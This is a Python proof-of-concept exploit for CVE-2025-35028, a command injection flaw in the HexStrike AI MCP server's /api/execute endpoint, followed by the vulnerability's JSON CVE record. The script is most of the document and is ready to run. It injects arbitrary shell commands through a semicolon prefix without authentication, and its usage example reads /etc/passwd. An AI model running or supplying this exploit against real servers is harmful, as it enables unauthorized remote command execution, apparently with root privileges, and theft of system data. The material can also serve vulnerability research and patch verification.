CVE-2025-35028

#!/usr/bin/env python3 # CVE-2025-35028 PoC - HexStrike AI MCP Server Command Injection # Description: Exploit command injection via EnhancedCommandExecutor API endpoint # Severity: CRITICAL (CVSS 9.1) import requests import json import sys def exploit_cve_2025_35028(target_url, command="id"): """ Exploit the command injection vulnerability in HexStrike AI MCP Server. By prefixing the command argument with a semicolon, attackers can inject and execute arbitrary system commands with root privileges. Args: target_url: Base URL of the vulnerable HexStrike AI MCP server command: System command to execute (default: 'id' for testing) Returns: Response from the exploited endpoint """ # Construct malicious payload with command injection # The semicolon (;) terminates the original command and injects arbitrary commands injected_payload = f";{command}" # Target the EnhancedCommandExecutor API endpoint endpoint = f"{target_url}/api/execute" # Prepare the malicious request payload = { "command": injected_payload, "args": [injected_payload] } headers = { "Content-Type": "application/json", "User-Agent": "HexStrike-CLI/1.0" } try: # Send the exploit request - no authentication required response = requests.post(endpoint, json=payload, headers=headers, timeout=10) return response.json() except requests.exceptions.RequestException as e: return {"error": str(e)} def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-35028.py <target_url> [command]") print("Example: python3 cve-2025-35028.py http://target:5000 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "id" print(f"[*] Exploiting CVE-2025-35028 on {target}") print(f"[*] Executing command: {cmd}") result = exploit_cve_2025_35028(target, cmd) print(f"[+] Result: {json.dumps(result, indent=2)}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-35028", "sourceIdentifier": "[email protected]", "published": "2025-11-30T22:15:46.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "By providing a command-line argument starting with a semi-colon ; to an API endpoint created by the EnhancedCommandExecutor class of the HexStrike AI MCP server, the resultant composed command is executed directly in the context of the MCP server’s normal privilege; typically, this is root. There is no attempt to sanitize these arguments in the default configuration of this MCP server at the affected version (as of commit 2f3a5512 in September of 2025)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/0x4m4/hexstrike-ai/issues/115", "source": "[email protected]"}, {"url": "https://takeonme.org/gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011", "source": "[email protected]"}]}}